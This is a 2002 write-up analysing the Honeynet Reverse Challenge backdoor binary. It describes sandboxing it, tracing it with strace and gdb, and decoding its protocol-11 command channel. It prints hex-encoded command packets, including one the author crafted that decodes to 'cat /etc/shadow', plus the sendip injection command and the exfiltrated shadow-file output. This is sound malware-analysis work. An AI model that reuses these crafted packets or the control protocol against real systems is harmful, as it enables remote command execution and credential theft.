Report: hostile code analysis methodology

Beginning on 6 May 2002, I ran various analyses of "the-binary" released by Honeynet.org as the primary content of the Reverse Challenge.

Operating environment

Analysis

  1. preliminary setup/testing
  2. The first step in analysis was to establish a safe containment and perform initial review of the capabilities of the binary. An existing VMware 'guest' virtual machine was copied / archived to retain the ability to compare persistent data against a known starting point. The guest VM was initially setup with no network connectivity at all, and the-binary was run from a root commandline. diagnostics follow:

    ps output:
    USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND
    root     10527  0.0  0.0   244   72 ?        S    09:28   0:00 [mingetty]  
    
    netstat -an output:
    Proto Recv-Q Send-Q Local Address           Foreign Address         State 
    raw        0      0 0.0.0.0:11              0.0.0.0:*               7           
    
    lsof output:
    malcode   31923 root  cwd    DIR    8,2    1024          2 /
    malcode   31923 root  rtd    DIR    8,2    1024          2 /
    malcode   31923 root  txt    REG    8,2  205108      30258 /root/malcode
    malcode   31923 root    0u   raw                      1673 00000000:000B->00000000:0000 st=07
    grep      31932 root    1w   REG    8,2       0      30259 /root/malcode.notes
    
  3. initial checks of structure and operation
  4. I started the analysis by using simple tools to inspect the binarary and progressively delve deeper into its behavior and design. The 'strings' command was used to look for the basic elements and inspect for behavior keys (see bin.strings.txt). The following strings immediately stood out:

    malcode / trojan keys
      /tmp/.hj237349
      /bin/csh -f -c "%s" 1> %s 2>&1
      TfOjG
      *nazgul*
      /bin/csh -f -c "%s" 
    
    generic code keys
      @(#) The Linux C library 5.3.12
      nospoof
      RESOLV_SPOOF_CHECK
      gethostbyaddr: %s != %u.%u.%u.%u, possible spoof attempt
    

    Because the test system was running on a minimal distribution which did not include the "C-shell" I built / installed tcsh from source and ran the code again to establish whether its use of tcsh was to futher compromise the operating system. This seemed not to be the case. I ran MD5 checksums of the system before and after each early test, checking that 'md5sum' and some other critical binaries were not touched / modified / accessed by the binary. At this point I mostly narrowed the focus of analysis upon the binary's operation and network traffic.

    At this point I adjusted the VMware settings first to 'host-only' network access, after establishing that analysis would require network connectivity, and eventually to a virtual 'NAT' network interface, allowing the binary to see the Internet through a controlled interface. For most of the testing the Host OS was configured using IPTABLES to disallow traffic on the binary's control channel, protocol 11.

  5. Disassembly / tracing
  6. I initially used objdump and gdb to inspect the binary's operation. I also built / installed 'bastard' to generate assembly listings. I found that I could trace the binary's execution using gdb only up to the point of the first 'fork()' system call. I was also able to attach to the running process with 'gdb'.

    I spent some time working with the disassembled code and obtained a feel for how the binary operated. At this point I set aside the project until the challenge released the network data for testing, expecting that it would be easier to use valid network traffic to analyse the operational behavior than to undertake a fullscale code analysis.

    The release of the second set of binary data coincided with the release of 'fenris' a tracing & debugging tool which included a useful set of notes on the operation of the binary.

    I replicated Michal Zalewski's results, and chose to mostly rely on 'strace' which was able to trace the fork()-ed child processes and report all of the system calls and critically to dump the data read and written to files and to the communication sockets.

    Using strace I was able to obtain a fairly thorough picture of how the code operates. Working on the sandboxed host a typical command would be:

    strace -ff -o cmd_02 -e read=0,1,2,3,4 -e write=0,1,2,3,4 ./the-binary

    I also forced the binary to core-dump at numerous points along the way, using 'xdump' and diff to generate comparison information on the state of the code in different execution runs.

    It is likely that this malware was either developed as an addtion to the 'nc' (netcat) source. The strings extracted match many of the strings which can be extracted from a current 'nc' binary, including: 'warn' 'nowarn' spoof'. It seems unlikely that the malware was attached to a copy of 'nc' as part of the hostile injection, as the significant strings are buried in the midst of the code.

  7. Network data decode
  8. Working from the server hosting the VMware sandbox I found that 'nc' (netcat) proved intractible for writing to the binary's raw socket, I went looking for an alternative and found 'sendip'. After extracting the 'command packets' from the supplied file 'snort.log', the following commands write that data to the sandboxed system and records the network traffic between the binary and its control station.

    sendip -p ipv4 -is 192.168.1.1 -ip 11 -ii 4095 -f 192.168.1.13

    tcpdump -s 1500 -w addrs.dat -i vmnet8 'host 192.168.1.13 and port not 22' &

    This records the network traffic between the binary and both it's controlling station and result data reported. I knew both from the string data extracted from the binary as well as from the 'strace' data that the code is using /bin/csh to execute the command that was injected over it's control it was a simple matter to remove /bin/csh, which was only a symlink for /usr/bin/tcsh and replace it with the following script:

    echo $$ $* >> /root/.log
    exec $3 $4 $5

    This allows the plaintext to be extracted with 'tail -f /root/.log'. Using this approach to watch the binary's own decode output I created the following new data sets (hex-dump):

    
    Original: decodes to   "rpcinfo -p 127.0.0.1"
      00000000    02001731 ba41bb3b c03dc3fa 3ec5fc44    ...1.A.;.=..>..D
      00000010    8ddb2067 acf33880 97aec5dc f30a2138    .. g..8.......!8
      00000020    4f667d94 abc2d9f0 071e354c 637a91a8    Of}.......5Lcz..
    Trial:    decodes to:  "aaaaaaaaaaaaaaaaaaaaaa"
      00000000    02001731 a9219911 890179f1 69e159d1    ...1.!....y.i.Y.
      00000010    49c139b1 29a11991 09819861 78787878    I.9.)......axxxx
    Attack:   decodes to:  "cat /etc/shadow"
      00000000    02001731 ab23aee5 2ba732ac f27cfb73    ...1.#..+.2..|.s
      00000010    ee740239 acf33880 97787878 78787878    .t.9..8..xxxxxxx
    
    

    The choice of IP numbers for this reporting is, as near as I can tell randomly selected at activation and does not change within an instance. While I find this odd (and presumably not very useful), sending exactly identical 'wakeup' and 'command' sequences resulted in different outgoing IP connections at every instance, while within an instance the same half dozen targets are repeatedly accessed. I can only conclude that the targetting is either addressed in a separate command which would require a more complete disassembly of the binary, or is random.

    The binary accepts and transmits data in the following form:

    bytevalue(s)useage
    0002|03command
    0100n/a-fill?
    0200-ffstop-difference
    03??unknown?
    04-stopencodedpayload/
    command

    The test-data provided by the challenge includes control packets sent to the binary. These seem to consist of 2 'wakeup' commands, followed by a shell-command. The shell command will be run anytime it is asked for, however the network-replies are only initiated if the 'wakeups' have been sent priorly.

  9. Result
  10. The packets returned by the binary include the results (or error messages) of the shell comands above. These can be decoded either by feeding them back to the binary (using 'sendip' and 'tail'-ing the log file from the fake version of 'csh'), or by using the decode program (decode.c). Either way the result is:
    
    Ġoot:$1$ON4/ZLzZ$nOYPr6JXSXMB2FYKZXYXl0:11765:0:99999:7:::
    daemon:x:11521:0:99999:7:::
    bin:x:11521:0:99999:7:::
    sys:x:11521:0:99999:7:::
    
    

    We can see that not all of the data from the shell command is returned (and which part is sent seems to be a moving-target), however the result is effectively that the data gets out.

  11. Foibles / questions
  12. The binary sometimes opens a raw socket on protocol 255:
    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name   
    raw        0      0 0.0.0.0:255             0.0.0.0:*               7           10943/[mingetty]    
    
    This has typically occured when sending random or invalid data to the sanboxed system in probing its operation. I tested that socket at one point by using 'sendip' to deliver data and watching the code's behavior with tcpdump. Essentially the binary does not seem to ever read any data from this socket. I presume it is either an unanalysed feature or a program bug.
    raw    65056      0 0.0.0.0:255             0.0.0.0:*               7           10943/[mingetty]    
    

    Additionally there is the open question of why the binary's output packets which include an encoded report of the output of the attacker's shell command in plaintext in the output. Also I found that a part of the command packet (about 100 bytes) is duplicated in the response packet after the enocoded reply section.

Author / contact

Forrest Whitcher 31 May, 2002 fw_sec@fwsystems.com
References http://www.sourceforge.net/projects/bastard
http://lcamtuf.coredump.cx/fenris/
http://www.earth.li/projectpurple/progs/sendip.html
Xdump from Programming Perl Larry Wall
iperl.pl (simple perl-shell included iperl.pl

Copyright © 2002 FW Systems LLC, All Rights Reserved